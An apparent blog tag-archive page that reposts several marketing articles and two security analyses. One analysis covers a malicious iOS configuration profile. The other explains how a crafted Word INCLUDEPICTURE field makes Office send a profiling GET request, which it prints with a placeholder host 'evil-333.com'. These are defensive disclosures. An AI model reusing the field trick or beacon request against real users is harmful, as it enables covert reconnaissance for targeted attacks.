Tag Archives: Education

How to Run a Successful Facebook Contest: Ideas, Tips, and Examples

/ Leave a Comment

It’s an understatement of epic proportions to say there’s a lot of activity on Facebook every day. This biggest of the social networks has climbed to more than two billion users and 70 million Business Pages.

So, how can your brand stand out from the crowd?

According to a poll conducted by the Content Marketing Institute and ion interactive, 81 percent of content marketers say interactive content (like polls, contests, quizzes, and so on) grabs readers’ attention more effectively than static content. It’s not surprising, then, that half of content marketers are using contests as a component of their marketing strategy.

Facebook contests

An engaging Facebook contest can be an effective way to capture attention and support your business goals. In this post, we’ll explain everything you need to know to run a successful Facebook contest, and take a look at some Facebook contest examples that showcase what other brands are already doing right in the Facebook contest space.

Table of contents

Facebook contest rules

Facebook contest ideas and examples

How to run a Facebook contest: Tips and best practices

Bonus: Download a free guide that teaches you how to turn Facebook traffic into sales in four simple steps using Hootsuite.

Facebook contest rules

Before you start planning the specifics of your Facebook contest, it’s important to understand the Facebook contest rules. Let’s looks at some key dos and don’ts.

Facebook contest rules: The dos

1. Do comply with all applicable laws and regulations

You’re probably not surprised to learn that your Facebook contest has to be legal. But if you’ve never run a contest before, you might be surprised how complicated the rules for running a contest can be. They vary significantly between countries, and even within countries. For example, Quebec’s unique contest rules mean the province is excluded from many contests that are open to other Canadians.

Do your research to ensure that your contest abides by all relevant legal rules and regulations, including age and residency restrictions.

2. Do make it clear that YOU are offering the contest, not Facebook

Your contest language must make it clear that the contest “is in no way sponsored, endorsed or administered by, or associated with, Facebook.”

Your contest terms and conditions must also make it crystal clear that Facebook is not responsible for any issues related to the contest—accepting the terms must indicate “a complete release of Facebook by each entrant or participant.”

By running a contest on Facebook, you also assume all risk for the contest. Facebook says, “We will not assist you in the administration of your promotion, and you agree that if you use our service to administer your promotion, you do so at your own risk.”

Facebook contest rules: The don’ts

1. Don’t run a contest on your personal Timeline

Only Business Pages can be used to run a contest. If you only have a personal Facebook profile, you’ll need to create a Business Page before launching your first contest.

2. Don’t encourage sharing the contest to gain extra entries

Facebook prohibits using “friend connections” to administer contests. That means you can’t encourage users to share your contest with their friends in order to get more entries. Facebook provides two specific examples of language that breaks this rule: “share on your Timeline to enter” and “share on your friend’s Timeline to get additional entries.”

No matter how you phrase it, asking users to share your contest is not allowed. Stick to asking them to like or comment instead, and keep in mind that these actions will also bring extra exposure, since all those likes and comments will boost your post’s popularity and win points with the Facebook algorithm. You can also ask users to post on your Page or message your Page.

3. Don’t encourage tagging to enter

Facebook does not want people tagged in photos or posts in which they do not appear—it makes things confusing for everyone. Again, Facebook is quite clear about this in their contest rules: “Tag your friends in this post to enter” is specifically prohibited.

You’ve likely seen contests that break both of those last two Facebook contest rules—but don’t follow their lead. Facebook states very clearly that both sharing and tagging are not permissible entry requirements, and the rule-breakers will get caught sooner or later.

Since Facebook regularly updates its rules, you should always check for changes before you launch a new contest. Check out the Facebook Pages Terms and scroll down to Promotions to find the specific rules that apply to contests.

Facebook contest ideas and examples

Let’s look at some Facebook contest ideas to help you decide what form of contest is the best fit for your business goals.

Like or comment to win

“Like to Win,” “Comment to Win,” and “Like and Comment to Win,” are among the easiest contests to run, and since they’re so easy to enter, they can elicit a lot of fan participation. You can simply share a photo, video, link, or even a simple status update to get your contest started. Just state the rules in your post, let your audience know what the prize is, and include a clear call to action. That’s it­—your contest is up and running.

Pura Vida Bracelets recently ran a contest in which they asked people to use the comments on a post to say which bracelet they liked best. Each comment counted as an entry to win five bracelets. They got 1,500 comments within seven hours, and more than 2,200 by the time the contest wrapped up just a couple of days later.

This contest had an added bonus for Pura Vida Bracelets. In addition to drawing attention to its brand, the contest helped to gather customer intelligence. By tallying the votes for the specific bracelets in the photos, Pura Vida could tell which bracelet was more popular, giving the company some free research about what its customers prefer.

Photo caption contest

A caption contest is another simple and effective option. Choose a compelling photo or graphic that supports your Facebook goals (building brand awareness, for example), and encourage people to post a caption idea in the comments. You can pick the winner(s) yourself, or stipulate that whichever entry gets the most Likes wins.

The Chicago Bears run an ongoing caption contest series, where they ask fans to caption photos of players for a chance to win a $25 Dunkin’ Donuts gift card.

The posts regularly get 400 to 1,000 comments, making them a great way to encourage fan engagement with the team.

Knowledge-testing question or trivia contest

Asking your audience to answer a relevant question can be a good way to gauge their level of knowledge or understanding about your industry or product. This can help you learn more about the kinds of background information you need to address when talking to potential customers about your product or service offers in the future.

This approach can also compel people to seek out information on your website. You can pose a question or series of questions, then point users to your website to find the information. It’s a good way to get people to your website who may never have visited before.

Finally, a trivia question can be used to highlight the features or benefits of your product, as in this contest from Jindal Stainless, a metal supplier in India, which spotlights the benefits of a stainless steel kitchen right in the trivia question.

If you’ve been paying attention, you’ll notice that the Jindall Stainless contest actually breaks the Facebook contest rules—did you spot how? It asks entrants to share the post and tag their friends to increase the odds of winning, both of which are against Facebook’s terms. So, model this contest idea, but not the execution.

User-generated content contest

User-generated content (UGC) is exactly what it sounds like: content generated by users. Offering a prize to fans who post great photos or other content not only generates engagement on your Page, but also gives you a rich supply of material to repost yourself over time.

Rocky Mountaineer runs a monthly photo contest on its Facebook Page, bringing in lots of great UGC the company can share across its social channels.

Rocky Mountaineer also posts all of the photos in a gallery on its website, giving prospective customers a glimpse of the impressive landscapes and wildlife they could spot on a Rocky Mountaineer tour.

Bonus: Download a free guide that teaches you how to turn Facebook traffic into sales in four simple steps using Hootsuite.

How to run a Facebook contest: 7 Tips and best practices

1. Set goals

As with all marketing strategies, you need clear goals to ensure you design your contest to produce the desired results.

What are you hoping to get out of the promotion? How will a contest help you drive business results? You need to answers these questions before you start building your contest, since your contest strategy will differ depending on whether you’re trying to, say, increase Page Likes or bring in qualified leads for your sales team.

You could also use a contest to build brand awareness, drive traffic to your website, or boost engagement.

2. Keep things simple and make it easy to participate

In the Facebook contest examples shared above, the entry process is a maximum of two steps: Like, comment, upload a photo, or some combination of these. But you will come across contests that have complicated entry processes, with multiple steps over multiple screens, asking for far more information that most people are willing to give to a company they may not have done business with before.

eMarketer estimates that more than 80 percent of social network users log on with a mobile device, so it’s a good idea to limit the entry process to a few clicks or taps, or a couple of fields of information that are easy to complete. Don’t ask for more information than you need, as too big an ask will cause people to drop off before they complete the entry process. Be sure to test your contest entry process across all mobile devices (iPhone, Android, Windows, tablets, and so on).

Keep your rules simple, too—and easy to find—so that people can understand exactly what they can win, and how you will use any personal information they provide. If you’re asking for user-generated content, make sure to be clear about exactly what rights contest entrants give you by submitting their work, and where the content might be used.

3. Offer a prize that resonates with your audience

The kind of prize you offer—and how much it’s worth—will vary depending on your Facebook contest goals. If you’re simply trying to increase engagement, you can offer a relatively low-value prize that’s appealing to a wide audience, like the Dunkin’ Donuts gift cards used in the Chicago Bears example above.

If you’re asking people to submit content—like photos—that you can use in your social network posts or marketing materials, you may need to offer a prize with a higher value.

You’ll want to put the most thought into your prize if you’re using your contest to generate qualified leads. You’ll want a prize that’s appealing to people who are likely customers, but not all that appealing to people who would not want to do business with you. It’s not the value of the prize that’s most important, but how well it connects with the most relevant prospects for your sales team.

Don’t offer a broadly appealing prize like an iPad in a contest designed to qualify leads, as you’ll attract plenty of entrants but they will be about as qualified as random numbers from the phone book. Stick to something specifically related to your product to qualify leads.

Some contests require no prize at all—other than recognition. Photo caption contests in particular can encourage loads of engagement without a prize giveaway.

The TV show Tosh.0 has an ongoing caption “challenge” (rather than a “contest”) in which Page fans compete to come up with the best caption for a photo by posting in the comments. Even though the only prize is being named as the person with the best caption (or, as the Page puts is, “we’ll share your glory on Facebook”), these posts regularly get upward of 700 comments. (Note that the comments/captions may be NSFW.)

This twist on a contest won’t support all types of business goals, but it can be an effective way to get Page followers involved and extend the reach of your brand as their comments will get your post to appear in their friends’ Timelines.

4. Use targeting to avoid annoying existing fans

I live in Canada. I follow a lot of American companies and brands on Facebook, since many don’t have separate Pages for my country. One of my absolute pet peeves is seeing a post for a contest with a great prize that I really want to win, only to click through to the rules and learn that the contest is open to U.S. residents only. Yes, I’ll comment on the relevant post, but only to share my frustration—and I’m usually not the only one.

With Facebook’s extensive targeting options, there’s no reason for this to happen: You can geotarget your contest posts so that only people in the relevant countries see it following these instructions for posting directly to Facebook or these ones for posting via Hootsuite.

Also make sure to appropriately target any Facebook ads you use to promote your contest.

5. Leverage all your social channels

Cross-channel promotion ensures your contest reaches the broadest possible audience. You could use Twitter to provide contest updates and drive participants to Facebook. If your contest has a photo-sharing element, it’s a natural fit to cross-promote on Instagram.

At the same time, you don’t want to annoy your social audience with excessive promotion. Scheduling contest posts across channels in advance can be a great way to ensure you don’t go overboard.

6. Use paid promotion to extend your audience

If you want to draw as many eyeballs as possible to your Facebook contest, you may want to invest in some Facebook advertising. Lead ads, like the one below from SkinCeuticals can be particularly effective way to promote a contest. The lead generation form can be pre-populated with the entrant’s information, like name and email address, making entry as easy as a couple of taps.

Facebook contest
Facebook contest

7. Measure your Facebook contest performance

When your Facebook contest has wrapped up and the prize has been sent to the lucky winner, you’ll want to reflect on how things went. As in all marketing efforts, tracking your results and learning from went right—and what didn’t—is an important part of developing your strategy for the future, and tracking ROI.

Remember those goals you set before your launched your contest (you did set goals, right)? Analyze how well your results match up to your expectations. Be sure to look for unexpected successes, too. Maybe you didn’t get the number of new followers you expected, but you did significantly increase engagement from existing fans. If that’s a worthwhile result for your company, you might want to design new contents with that specific goal in mind.

As you’ve seen from the Facebook contest examples in this post, Facebook contests can take many different forms, and can produce many different results. As you think about your contest performance, keep the following questions in mind:

  • Did I choose the right type of contest?
  • Did I give my contest enough time?
  • Did I target the right audience?
  • Did the giveaway provide enough incentive?
  • Did I define a clear set of rules? Were they easy to follow?
  • What was the biggest obstacle I faced in running the contest?

If your contest was a roaring success, you’ve got a clear model you can use to run another contest in the future. If your process needs some tweaking, think about whether you should set different goals or performance targets for your next contest. Through ongoing testing and refinement, you’ll discover what your audience responds to the most, and what works best for your brand.

Manage your Facebook presence by using Hootsuite to schedule posts, share videos, engage with followers, manage ads, and measure the impact of your efforts. Try it free today.

Learn More

The post How to Run a Successful Facebook Contest: Ideas, Tips, and Examples appeared first on Hootsuite Social Media Management.

Source: http://ift.tt/1LdunxE

What is SEM?

/ Leave a Comment

If you are coming to this article as a novice, I know what you are thinking. “Not another damned 3 letter acronym! Don’t we have enough?”

Well, apparently not, and unfortunately there isn’t all that much we can do to stop the ever growing database of aforementioned acronyms.

We must therefore get accustomed to not only knowing what they stand for (Search Engine Marketing, in case you were wondering) but also what they actually mean.

The first one is pretty easy. You now know what SEM means in its most basic form – “search engine marketing”. However, the issue is that even those in the SEM industry will disagree on what the component parts of search engine marketing are or what the main focus of SEM is.

At Search Engine Watch we have covered this topic back in 2014, but much has changed since then. We’re going to take a slightly different tack with this one. Instead of looking at what major organisations and websites define as SEM we’re going to look at what could possibly be encompassed by the term SEM.

So let’s dive straight in.

The main consensus

As per the original article on this topic, if you had to pick one overall consensus it would be that the major factor in SEM has traditionally been paid search. For the sake of argument let’s refer to paid search as Google Adwords. This is somewhat linked to the more traditional pay to play advertising association with the word ‘marketing’, and therefore AdWords gets the nod in front of SEO.

However, over the years SEO has made up significant ground in terms of its visibility in the marketing world (and to clients). As such, whilst some may say that SEO comes in a close second as part of the SEM umbrella, there are many that would say that SEO is now a legitimate stand alone practice. In the second scenario this would mean that SEM is somewhat dominated by its association with Google Adwords.

Our opinion? SEM has far stronger links to paid search than paid and organic together, but that’s just us.

The broad approach

It could quite rightly be argued that SEM encompasses anything that improves a website’s visibility via search engines. On the face of it, Adwords and SEO would be the dominant pair here.

However, as our relationship with Google becomes ever more entrenched and complex (both as users and marketers) the list of potential factors that could be included in SEM expands. Let’s look at some of the major ones below:

Adwords and SEO

I think you guys get the point on this one. The Federer vs Nadal of the SEM conundrum.

Roger Federer playing in the US Open 2012, crouching down low to hit the ball with his racket.

Image by Christian Mesiano, available via CC BY-SA 2.0

Local search

Yes, this should be an element of any comprehensive SEO campaign, but many would argue that this will more and more become its own discipline. When Google Maps are displayed for a search query, they take a dominant position in the results page.

Further to this, since 2014 mobile search has continued on its stratospheric trajectory and with the Google Maps app on smartphones everywhere, it is a significant channel through which visibility on search engines can be increased.

Google Shopping

Here come the trolls: “Google Shopping is pay per click and is therefore included under PPC”. Riddle me this, troll, why do you think we were specific about Paid Search referring to Adwords – and if they were so similar, why are they managed via different platforms?

The recent record EU fine for Google’s actions surrounding Google Shopping may have dented their ego but it does not stop Google Shopping from being a popular source of product browsing and subsequent purchase. A well-managed Google Merchant Centre account can be a fruitful form of SEM, used by blue chips and independent retailers alike.

PR or link building

Seriously? Yes, seriously. Search engines are sources of information and not all searchers are super specific. A prime example of this is someone searching for ‘Wine Bars in London’. Whilst you may expect Google to return the likes of Humble Grape or Gordon’s Wine Bar in the results, you will actually find that the main results are dominated by lists.

Google understands that the searcher is looking for options. What better way to give value to the user than by returning curated lists of wine bars from the likes of Time Out or Design My Night?

If this is the case (which it is), in a slightly roundabout way and not directly increasing visibility on the search results, exposure on these types of sites via a PR campaign will still influence your visibility via search engines.

The focus is still on Adwords

Indeed. Google Adwords is the star player of SEM and will continue to be so for more than just 2017. Hopefully the above has demonstrated that there are a number of factors that could legitimately fall under the term SEM; we haven’t even looked at image search, the news feed, or the Knowledge Graph.

In the end, we would argue that the term SEM is falling out of favor. People have realised that the digital ecosystem is more complex than it was and practices such as Google Adwords or SEO are stand-alone services.

Ultimately, clarity is key. If you want to talk about Adwords, refer to it as Adwords. If you want to talk about SEO, say SEO.

For those providing a service that could be incorporated under the SEM umbrella, or are actively using the term during talks with prospective clients or with existing clients and insist on using SEM as a term, it is advisable that you look to define exactly what your definition of SEM is. In fact, if we looked honestly at ourselves as an industry, we have a tendency to throw about acronyms and terminology that can be mighty confusing to those instructing agencies!

Be aware of what you might deem as an ‘assumed level of knowledge’; clients will appreciate clarity, and you can evade any easily avoidable misunderstandings!

Source: http://ift.tt/1JcVoR1

iXintpwn/YJSNPI Abuses iOS’s Config Profile, can Crash Devices

/ Leave a Comment

by Hara Hiroaki, Higashi Yuka, Ju Zhu, and Moony Li

While iOS devices generally see relatively fewer threats because of the platform’s walled garden approach in terms of how apps are installed, it’s not entirely unbreachable. We saw a number of threats that successfully scaled the walls in 2016, from those that abused enterprise certificates to ones that exploited vulnerabilities to curtail Apple’s stringent control over its platforms.

This is further exemplified by iXintpwn/YJSNPI (detected by Trend Micro as TROJ_YJSNPI.A), a malicious profile that can render the iOS device unresponsive. It was part of the remnants of the work of a Japanese script kiddie who was arrested in early June this year.

While iXintpwn/YJSNPI seems currently concentrated in Japan, it won’t surprise anyone if it spreads beyond the country given how it proliferated in social media.

iXintpwn/YJSNPI first appeared in late November 2016 via Twitter—and subsequently over YouTube and social websites—posing as an iOS jailbreaker named “iXintpwn”. It’s also the name of the website the malicious profile is hosted in. The overflow of icons it places over the affected device’s screens appears as “YJSNPI”. It was also known as “Beast Senpai” (senpai means teacher or mentor in Japanese) as a reference to the image used as a meme in Japanese online forums.

Regardless if it was created as a prank or to gain notoriety, its attack chain is notable, as attackers can weaponize the iOS feature iXintpwn/YJSNPI misuses: unsigned iOS configuration profile.

YJSNPI can proliferate by accessing the website hosting the malicious profile, especially via Safari. The malicious site contains a JavaScript, and responds with a blob object (the malicious profile) when the user accesses it. On iOS devices, the latest Safari accepts this server response and will automatically download the profile.

Figure 1: Code snippets showing YJSNPI as a blob object (top), and how it’s retrieved in Safari (bottom)

Abusing iOS Configuration Profile
An iOS configuration profile enables developers to streamline the settings of a huge number of devices, including email and exchange, network, and certificates. Enterprises employ these profiles to streamline the management of homegrown apps and corporate devices, for instance. A configuration profile can also customize the settings of a device’s restrictions, Wi-Fi, Virtual Private Network (VPN), Lightweight Directory Access Protocol (LDAP) directory, Calendaring Extensions to WebDAV (CalDAV), web clips, credentials, and keys.

Evidently, a malicious profile can be used to manipulate the settings, i.e., divert the device’s traffic. Examples of this include the information-stealing Wirelurker and adware-laden repackaged apps from Haima.

In iXintpwn/YJSNPI’s case, it uses an unsigned profile and sets it to “cannot be deleted” to make it more difficult to uninstall, as shown below. For persistence, the value for “PayloadIdentifier” string is randomly generated via JavaScript. Note that iOS has countermeasures in place for installing signed or unsigned profiles, which requires direct user interaction. The only difference is how these profiles are displayed—signed profiles are indicated as “verified”, for instance.

Figure 2: iXintpwn/YJSNPI using an unsigned profile

Figure 3: The malicious profile set as unremovable (left) and the icons overlaying the device screen (right)

Figure 4: Code snippets showing how the PayloadIdentifier’s value is generated (top and middle) that results into various iXintpwn configuration profiles (bottom)

iOS SpringBoard Icon Overflow
Upon iXintpwn/YJSNPI’s profile installation, an icon will be awkwardly superimposed on the home screen. Clicking it results in an overflow of YJSNPI icon-laden screens that crashes SpringBoard—the application that manages the home screen and controls how apps are displayed and launched. The YJSNPI icons are clickable but will only show a bigger resolution of the icon’s image. It is also during this overflow of icons that the device becomes unresponsive.

Figure 5: iXintpwn/YJSNPI’s icon hovering in the home screen (left); screenshot of an iPad’s home screen populated with YJSNPI’s icons (right)

Mitigation and Best Practices
Thankfully, YJSNPI can be removed from the device despite it being set as unremovable. Affected users can use Apple Configurator 2, Apple’s official iOS helper app for managing Apple devices via a Mac, to find and remove the malicious profile under the Actions function.

However, there are caveats. YJSNPI has to be fully installed or the icons won’t be removed—that is, the profile will not show up when Apple Configurator 2 is run. There is also no Windows version of Apple Configurator 2.

Follow best practices to improve mobile device security, especially if the iOS device you use runs in a BYOD environment. Regularly update and patch your iOS and apps and download only from the App Store or trusted sources. Beware of the risks of jailbreaking, and be aware of the permissions you grant to unknown or suspicious apps or profiles. App developers are likewise recommended to secure the apps they develop so that their apps can’t be abused to spread malware.

Trend Micro Solutions
End users and businesses can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security for Apple devices (available on the App Store). Trend Micro™ Mobile Security for Enterprise also provides device, compliance and application management, data protection, and configuration provisioning, as well as protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

iXintpwn/YJSNPI Abuses iOS’s Config Profile, can Crash Devices

http://ift.tt/2xKFnRB Source: http://ift.tt/1amucZ5

An (un)documented Word feature abused by attackers

/ Leave a Comment


A little while back we were investigating the malicious activities of the Freakyshelly targeted attack and came across spear phishing emails that had some interesting documents attached to them. They were in OLE2 format and contained no macros, exploits or any other active content. However, a close inspection revealed that they contained several links to PHP scripts located on third-party web resources. When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers received information about the software installed on the computer.

What did the bad guys want with that information? Well, to ensure a targeted attack is successful, intelligence first needs to be gathered, i.e. the bad guys need to find ways to reach prospective victims and collect information about them. In particular, they need to know the operating system version and the version of some applications on the victim computer, so they can send it the appropriate exploit.

In this specific case, the document looked like this:

There’s nothing suspicious about it at first glance – just a few tips about how to use Google search more effectively. The document contains no active content, no VBA macros, embedded Flash objects or PE files. However, when the user opens the document, Word sends the following GET request to one of the internal links. So we opened the original document used in the attack, replaced the suspicious links with http://evil-*, and obtained the following:

GET http://ift.tt/2wB9dmM HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed. We decided to examine why Office followed that link, and how these links can be identified in documents.

Inside a Word document

The first thing about the document that caught our eye was the INCLUDEPICTURE field containing one of the suspicious links. However, as can be seen, that is not the link that Word addresses.

As a matter of fact, the data chunk seen in the fragment above contains the first and only piece of text in this document. The text in Word documents resides in the WordDocument stream in a ‘raw state’, i.e. it contains no formatting except so-called fields. The fields tell Word that a certain segment of the text must be presented in a specific way; for example, it is thanks to these fields that we can see active links to other pages of the document, URL links, etc. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text. The 0x13 byte (marked in red) in front of this field indicates that the ‘raw’ text ends there and a field description begins. The description format is roughly as follows (according to [MS-DOC]: Word (.doc) Binary File Format):

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

The separator byte 0x14 is marked in yellow, and the field end byte 0x15 is shown inside the pink box.

The link to the image in the INCLUDEPICTURE field should be in ASCII format, but in this case it is in Unicode, so Word ignores the link. However, the separator byte 0x14 is followed by the byte 0x01 (shown in the green box) which indicates to the word processor that an image should be inserted at this point. The question is: how do we find this image?

The characters and groups of characters within the text also possess properties; just like fields, these properties are responsible for formatting (for example, they specify that a certain piece of text must be rendered in italics). The properties of characters are stored in a two-level table within document streams under the names ‘xTable’ and ‘Data’. We will not go into the complex details of how to analyze character properties, but as a result of this analysis we can find the character properties from the offset 0x929 to 0x92C in the WordDocument stream:

This is the byte sequence with the picture placeholder 0x14 0x01 0x15. In the actual document, these bytes are located at offsets 0xB29 – 0xB2C, but the WordDocument stream begins with offset 0x200, and the character offsets are specified relative to its beginning.

The properties of the group of characters CP[2] indicate that an image is attached to them that is located in the Data stream at offset 0:

1FEF: prop[0]: 6A03 CPicLocation
1FF1: value[0]: 00000000 ; character = 14

We arrive at this conclusion based on the fact that byte 0x01 is indicated in the INCLUDEPICTURE field’s value – this means the image should be located in the Data stream at the appropriate offset. If this value were different, then it would have been necessary to look for the image in a different place or ignore this property.

This is where we stumbled on an undocumented feature. Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field. This is all there is:

0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section

Standard ECMA-376 describes only that part of INCLUDEPICTURE that precedes the separator byte. It has no description of what the data that follows it may mean, and how it should be interpreted. This was the main problem in understanding what was actually happening.

So, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:

Forms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This form has a name and, in this case, it is another suspicious link:

However, this is just an object name, so this link is not used in any way. While investigating this form further, let’s look at the flags field (in the red box):

The value 0x0000000E resolves into a combination of three flags:

  • msoblipflagURL 0x00000002
  • msoblipflagDoNotSave 0x00000004
  • msoblipflagLinkToFile 0x00000008

This indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot), and that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag, which prevents this content from being saved to the actual document when it is opened.

If we look at what this URL is, we see that it’s the actual link that Word follows when the document is opened:

We should note that besides Word for Windows, this ‘feature’ is also present in Microsoft Office for iOS and in Microsoft Office for Android; LibreOffice and OpenOffice do not have it. If this document is opened in LibreOffice or OpenOffice, the malicious link is not called.

This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks.

Kaspersky Lab’s security products are able to detect when the technique described in this article is used in Microsoft Word documents, and to find links embedded in a document using the same technique.

http://ift.tt/2x7yk51 Source: https://securelist.com

The One Skill That You Need Need To Master in Content Marketing

/ Leave a Comment

Ignorance is bliss.

The beginner strikes out and doesn’t see the dangers ahead. The novice driven by passionate curiosity doesn’t see the complexity of the task of mastery. It is just seen as an exciting adventure.

But as they dive into the the complex ecosystem of subjects, technologies and thought bubbles that sat in and around the core, doubts emerge and questions are raised. The content marketer has the same challenges.

Should I be creating live stream videos, become proficient at the new platforms or master marketing automation. Should I start a podcast? A webinar?

Overwhelm strikes.

This is the point that many people stop. They have so many choices that they freeze. Hesitate.

The trick?

Work out what to focus on.

The one skill

There is one skill that all content marketers need to learn. The art of writing.

Good writing skills underlines and supports video and even audio. The headline, script and description are just a few. Crafted words and considered communication are important in changing minds and moving hearts.

But If any sort of writing talents were bypassed at birth then you may need to hire them. That maybe an ex-journalist, trained writers or start asking guest authors to contribute.

The hidden benefit of writing

Now content marketing can often be seen as just a customer acquisition tool and also for positioning you as a thought leader and influencer in your industry. But that is only part of the reason you should be creating content and writing.

Content creation can sometimes feel like a waste of time that distracts you from billing clients and making money. But writing every day about your industry and your core topics will take you to a new level of insight, learning and clarity.

The discipline and craft of wrangling words will change and transform your life if you commit to it.

So what is important?

Writing well requires many elements. So what is important? Well I can state the obvious and mention grammar and spelling.

When I first started out the writing police turned up in the comments and on Facebook. My amateur proficiency at grammar and spelling were called out. But don’t let that stop you. You are doing something many people don’t do. Executing and doing. Many people stop at a good idea.

But beyond those two fundamentals there are some insights that stand out for me. And when I started out I hardly gave them a passing thought.

Here are some aspects of writing for the social web that need to included in your content marketing toolbox.


The goal of the headline is to get you to read the first line. That is the start of your introduction.

Then the goal is to get them to read the rest. Draw them in. How do you do that?

Here are 3 quick and dirty tips to get you thinking about how to craft your introductions.

  1. Open with a question
  2. Use Storytelling is another way to start a blog post or an article. Stories have been with us since the dawn of time.s
  3. Provide a quote


Ever seen a wall of dense text with long paragraphs and close spacing? Does it make you want to click away?

In a time poor digital world where people dive into and out of online posts and text means that you need to work on structure. Writing a blog post that is designed for skimming and scanning is essential.

Use sub-headings, bullet points and short paragraphs in your writing.


“I would have written you a shorter letter but didn’t have the time”.

This quote attributed to many highlights the importance of producing clarity from what is often a cloud of confusion. This is more important in a digital world where technology engulfs us. Making the effort to be clear in your writing is worth striving for.

More is not better and often an important insight is buried in a mountain of words. 

Distilling complex concepts into clarity is a skill to develop and hone. As you write you need to put on your starting goggles. You need to write with the mind of a beginner. Put yourself in their shoes.

You were an amatuer once.


Ever heard a speaker that spoke in a monotone and the same rhythm? Bored? But you couldn’t leave the room?

On the web you are only one click away from oblivion. Good writing needs rythmn. So be interesting and mix up the length of your sentences.

Short sentences, medium and long are part of your writing toolkit. Even one word sentences work well.


Spelling it out is good. So making the content so clear that you lead them by the hand is often needed.

But sometimes getting people to fill in the blanks themselves is a powerful way to get them motivated. Let them work it out themselves is an important tactic to use.  

Imagination is a powerful force that allows people to come up with their own solutions. So try some abstraction that suggests rather than tells.


Sounding smart and using big words may be tempting. But unless you are trying to impress your professor while writing your thesis then avoid words that can’t be read or understood by a nine year old.

A book that is worth reading and has helped me is one of Stephen King’s few non-fiction books titled “On Writing”. In it he uses an example of a clever and powerful 53 word sentence from Mark Twain. He points out that 38 of those words are single syllable.

Big words and industry speak (think acronyms) are to be avoided at all cost.

Keep it simple.


“People will forget what you said but they will never forget how you made them feel”.

In that quote (often attributed to Carl Buechner) is the truth about the art of storytelling. Touching people’s hearts is at the centre of engagement. When I  started my online publishing venture it was all about the facts. Information, data and stats.

When I commenced my speaking career my Powerpoint’s were all about bullet points. More information and more stuff. When I began writing emails the facts were the main hero.

But if you want to move people, educate and transform you need more than that in your writing toolbox.

As marketers you need stories to be memorable. To persuade.

In a digital age and a noisy world we need the art of storytelling more than ever.  This will make your writing compelling and engaging. Touching hearts and imagination is one of your main goals.

Over to you

Writing often is perceived as not as exciting as video or as compelling and viral as enhanced and augmented Snapchat images. But it is still the foundation and core to powerful communication as a content marketer.

Writing is the one skill that will be the support act to everything else that you do.

The post The One Skill That You Need Need To Master in Content Marketing appeared first on Jeffbullas’s Blog.

Source: http://ift.tt/im5GqL

How to Vet a New Marketing Channel in 3 Days or Less

/ Leave a Comment

I get this question a lot.

“What marketing channel should I focus on?”

There are many make or break decisions in business. This is one of them.

The thing is, I can’t give you a cut and dry answer.

The nature of your business matters. So does the audience that you wish to target.

What I will do instead is give you a method for figuring this out for yourself.

If you’re starting a new business, this decision is critical. Focusing on the wrong marketing channel can set you back months and maybe even years.

If you’re expanding into a new market, selecting the wrong channel can also have massive ramifications.

You’d be putting your existing operations at risk for a new channel that may not pan out.

Just take a look at all the challenges that marketers have to overcome.

top marketing challenges jpg 1 320 783 pixels

You can imagine that each channel comes with a unique set of difficulties.

This speaks to the importance of vetting your marketing plan before you set it in motion.

There’s just too much at stake.

In this article, I’ll show you how you can evaluate your options and narrow down on the best choice quickly.

You don’t need more than three days to get this done.

But first, I have a bit of wisdom to share.

Resist the urge to diversify

You know that voice in your head that says you need to be everywhere at once?

That fear of missing out if you don’t at least try everything?

It’s a diversion. Resist it.

It is imperative that you focus on one marketing channel.

At least in the beginning.

It’s going to shortchange your success if you spread yourself thin.

Here’s why.

  • You’ll have less impact. If you’re focusing on several channels, it means you’re not doing everything you can to excel in any one of them.
  • It will cost you more. Testing and thriving with a multichannel approach costs way more than you may be willing to spend. If you want an organic and cost-effective approach, stick to one channel.
  • You’ll never actually know where your strength lies. Jumping from channel to channel means you won’t truly know the impact of one particular strategy on your business.
  • You’ll remain at the heels of your competitors. That’s not where you want to be, is it? You want to be ahead, and the way to do that is to establish dominance in your market.

Now, don’t misunderstand me.

I’m not saying that you should go all in on one channel and forget the rest.

But multichannel marketing is complex. Only 30% of marketers are confident that they can deliver on such a strategy.

The Importance of Multichannel Marketing Infographic

That’s not a lot.

So what I’m advocating for is starting from a position of dominance.

Put your energy into one strategy until it succeeds. Then, piggyback on that success to achieve wins in other areas.

Does that make sense?

The steps in this article will be geared towards helping you place a bullseye on the ONE channel that will serve you best.

Now that we got that out of the way, let’s begin.

Step #1: Know your options

The first thing you want to do is brainstorm all your possible options.

This isn’t something that you have to materialize out of thin air.

There are dozens of ways that you can connect with your target audience and spread your message.

Better yet, each channel has several subsets that you can zone in on.

Here’s a good representation:

How Does Digital Marketing Work Common SEO Questions

Many of these overlap. Some have even morphed into each other.

It can get confusing, quickly.

For example, some people consider SEO to be one marketing channel.

But I can’t imagine a world where SEO and content marketing aren’t intertwined. You can’t do one without the other.

The same thing goes for social media and paid advertising.

They’re different channels. But there’s a convergence.

Let’s imagine you decide to focus on Facebook as your primary social media platform. It would be unwise to not experiment with Facebook Ads.

Considering that Facebook has developed one of the greatest Ad products out there, you’d be underutilizing the full power of the platform.

Marketers agree. Almost 57% plan to increase their social media ad spend.

